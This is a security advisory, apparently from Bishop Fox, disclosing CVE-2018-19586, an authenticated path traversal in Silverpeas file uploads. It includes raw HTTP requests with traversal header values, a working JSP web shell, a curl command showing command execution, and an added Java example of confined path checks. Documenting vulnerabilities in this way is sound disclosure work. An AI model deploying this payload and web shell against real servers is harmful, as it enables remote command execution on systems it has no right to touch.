Product Description
From the vendor’s website:
“Silverpeas is an open source WEB platform that improves the collaboration between the actors of a company or organization.” Silverpeas is widely used by many notable French organizations including those in the media, retail, and government space.
Vulnerabilities List
One vulnerability was identified in Silverpeas versions 5.15 to 6.0.2.
Affected Versions
5.15 to 6.0.2
Solution
If you are using the affected versions of the Silverpeas software, please ensure you have the following mitigations installed:
Path Traversal
Silverpeas 5.15 to 6.0.2 is affected by an authenticated path traversal vulnerability that can be triggered during file uploads. This vulnerability enables regular users to write arbitrary files on the underlying system with the privileges of the user running the application. An attacker may leverage the vulnerability to write an executable JSP file in an exposed web directory and execute commands on the underlying system.
Vulnerability Details
CVE ID: CVE-2018-19586
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-23
CVSS Base Score: 9.9
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
The path traversal vulnerability is located in an upload mechanism that is reachable through several other features (e.g., forum, ideas) with regular user privileges. The application takes the upload path from the X-FULL-PATH HTTP request header without proper sanitization:
POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
…omitted for brevity…
Content-Type: application/octet-stream
X-FULL-PATH: ../../../../../../../tmp/test.png

FILE CONTENT
Figure 1 - File upload with path traversal payload
The file is then created in /tmp:
root@vulns:/tmp# ls -lah | grep -i test
-rw-r--r-- 1 root root 201 nov. 16 02:53 test.png
By default, files are uploaded to $SILVERPEAS_HOME/data/temp/[UUID]/, which is outside the application’s main directory. Through the use of the Silverpeas official installer, the core package (containing main Java classes and JSP files) is deployed in a virtual file system (VFS) whose path is randomized and not writable. However, the installer ships another web application resource (WAR) that is reachable under /weblib/ and whose path is not randomized.
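As an added example (not Silverpeas code), the snippet below shows the unsafe way of joining a client-supplied path to the upload directory next to a confined version that keeps every resolved path below $SILVERPEAS_HOME/data/temp/[UUID]/; the base directory value, the class and method names, and the bare-file-name rule are assumptions, and the two traversal strings are the header values shown in Figures 1 and 2.

```java
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.UUID;

// Added example, not Silverpeas code. Directory layout assumed from the advisory
// ($SILVERPEAS_HOME/data/temp/[UUID]/); the checks are lexical (normalize), so they
// assume the temp directory itself contains no attacker-controlled symlinks.
public class UploadPathCheck {
    /** Unsafe: the X-FULL-PATH header value is joined to the base directory as-is. */
    static Path resolveUnsafe(Path tempDir, String xFullPath) {
        return tempDir.resolve(xFullPath).normalize();
    }

    /** Confined: the normalized result must stay strictly below tempDir. */
    static Path resolveConfined(Path tempDir, String xFullPath) throws IOException {
        Path base = tempDir.toAbsolutePath().normalize();
        Path target = base.resolve(xFullPath).normalize();
        // startsWith compares whole components, so /a/b never matches /a/bc;
        // an absolute header value also fails here because resolve() discards base.
        if (target.equals(base) || !target.startsWith(base)) {
            throw new IOException("rejected upload path: " + xFullPath);
        }
        return target;
    }

    /** Stricter: an API that expects a bare file name can refuse any path structure. */
    static String requireBareFileName(String name) throws IOException {
        Path p = Paths.get(name);
        if (name.isEmpty() || name.equals(".") || name.equals("..") || name.contains("\\")
                || p.isAbsolute() || p.getNameCount() != 1) {
            throw new IOException("rejected file name: " + name);
        }
        return name;
    }

    public static void main(String[] args) {
        // Constructed base directory matching the advisory's default layout.
        Path tempDir = Paths.get("/opt/silverpeas/data/temp", UUID.randomUUID().toString());
        String[] headers = {"report.png",
                "../../../../../../../tmp/test.png",             // Figure 1 value
                "../../web/weblib.war/Aurora/css/webshell.jsp"}; // Figure 2 value
        for (String h : headers) {
            System.out.println("unsafe   -> " + resolveUnsafe(tempDir, h));
            try { System.out.println("confined -> " + resolveConfined(tempDir, h)); }
            catch (IOException e) { System.out.println("confined -> " + e.getMessage()); }
        }
    }
}
```

Running main prints the escaped locations produced by the unsafe resolver and the rejections produced by the confined one for both traversal values, while the legitimate name resolves under the UUID directory in both cases.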
The request below can be used to deploy a malicious JSP file:
POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
…omitted for brevity…
Content-Type: application/octet-stream
X-FULL-PATH: ../../web/weblib.war/Aurora/css/webshell.jsp
…omitted for brevity…

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
    String s = null;
    try {
        Process p = Runtime.getRuntime().exec(cmd,null,null);
        BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
        while((s = sI.readLine()) != null) { output += s+"\n"; }
    } catch(IOException e) { e.printStackTrace(); }
}
%>
<%=output %>
Figure 2 - Web shell upload
Command execution can then be achieved by using the deployed file, highlighted below:
$ curl 'http://vulns.lan:8000/weblib/Aurora/css/webshell.jsp?cmd=ls'
appclient  bin  copyright.txt  docs  domain  jboss-modules.jar  LICENSE.txt  modules  README.txt  standalone  welcome-content
Figure 3 - Successful command execution with deployed web shell
The issue is due to a lack of user-input sanitization in the FileUploadData Java class. For more information, see:
Disclosure Timeline:
- 11/10/2018: Initial discovery for version 6.0.2
- 11/26/2018: Initial notification of product vendor
- 12/01/2018: Versions 5.15 to 6.0.2 discovered to be affected
- 12/14/2018: Patches released for 5.15 and 6.0
Researcher:
Bastien Faure, Security Associate at Bishop Fox